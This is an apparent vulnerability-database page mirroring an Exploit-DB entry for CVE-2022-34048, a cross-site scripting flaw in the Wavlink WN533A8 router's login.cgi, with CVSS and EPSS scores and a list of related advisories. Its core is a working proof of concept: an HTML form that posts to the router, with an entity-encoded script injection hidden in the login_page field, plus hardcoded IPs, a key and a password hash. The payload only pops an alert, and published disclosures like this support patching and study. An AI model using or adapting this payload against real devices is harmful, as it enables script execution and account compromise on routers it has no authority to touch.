Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAhmed AlrokyEDB-ID:50989
HistoryAug 01, 2022 - 12:00 a.m.

Wavlink WN533A8 - Cross-Site Scripting (XSS)

2022-08-0100:00:00
Ahmed Alroky
www.exploit-db.com
368
wavlink wn533a8
cross-site scripting
xss
cve-2022-34048
windows
ahmed alroky
aiactive
m33a8.v5030.190716
vendor home page
authentication required
tested on
exploit title
exploit author
author company

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.8%

JSON
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows

# Poc code
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
      <input type="hidden" name="newUI" value="1" />
      <input type="hidden" name="page" value="login" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
      <input type="hidden" name="homepage" value="main&#46;shtml" />
      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
      <input type="hidden" name="key" value="M94947765" />
      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
      <input type="hidden" name="lang&#95;select" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Related

prion 1
packetstorm 1
cve 1
nvd 1
nuclei 1
zdt 1
cvelist 1
prion
prion
Cross site scripting
2022-07-20 17:15:00
packetstorm
packetstorm
Wavlink WN533A8 Cross Site Scripting
2022-08-01 00:00:00
cve
cve
CVE-2022-34048
2022-07-20 17:15:08
nvd
nvd
CVE-2022-34048
2022-07-20 17:15:08
nuclei
nuclei
Wavlink WN-533A8 - Cross-Site Scripting
2022-08-05 19:18:35
zdt
zdt
Wavlink WN533A8 - Cross-Site Scripting Vulnerability
2022-08-01 00:00:00
cvelist
cvelist
CVE-2022-34048
2022-07-20 16:50:11

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.8%

JSON
Related for EDB-ID:50989
prion1packetstorm1cve1nvd1nuclei1zdt1cvelist1